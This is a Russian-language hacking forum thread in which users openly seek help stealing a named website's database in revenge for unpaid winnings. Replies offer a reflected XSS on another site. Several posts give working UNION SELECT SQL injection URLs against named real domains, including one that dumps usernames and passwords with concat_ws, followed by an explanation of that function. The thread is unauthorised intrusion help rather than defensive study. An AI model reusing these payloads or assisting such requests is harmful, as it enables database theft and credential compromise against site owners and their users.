ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ОФФТОП ПРОСТИТЕ! помогите стырить бд http://www.syone.ru/ Причина: админ невыплатил все что выйграл! даже подовал в арбиртраж ,а они послали!

1 www.syone.ru
2 clavesin.ru

от него clavesin.ru

могу тока пассивную ксс'ку дать на сайте с одного ИП +)

http://w1.dwar.ru/user_info.php?nick=%CB%E8%F1%EE%F2%E0#[injection] огромная просьба помочь, если вообще это реально

Подскажите чего дальше делать?
подобрал число полей

h__p://sait.ru/index.php?page_id=-1+u nion+s elect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22

нашёл таблицу Users

h__p://sait.ru/index.php?page_id=1+un ion+s elect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22+from+user s

пробую использовать INFORMATION_SCHEMA ни чего не получается отображается страница

h__p://sait.ru/index.php?page_id=-1+u nion+s elect+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22+from+information schema.tables+limit+1,1

http://gpsautospb.ru/index.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,concat_ws(0x3a,username,password),19,20,21, 22+from+users

вывод в заголовке (title)

спасибо! тока объясни я просто ещё до этого оператора не дошёл concat_ws что он делает?

uniis, concat_ws(0x3a,username,password)
оператор позволяет в одной переменной выводить несколько полей.
0x3a - это шестандцатиричное двоеточие (для удобства разделения переменных), две последующие.. это переменные, которые нужно конкатинировать (объеденить), через 0x3a

http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_concat-ws

Попробуйте раскрутить
http://www.may-hosting.com/index.php?L=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30--

кто может помочь с инъекцией там сложновато все кто хорошо разбирается напишите в личку разговор долгий достаточно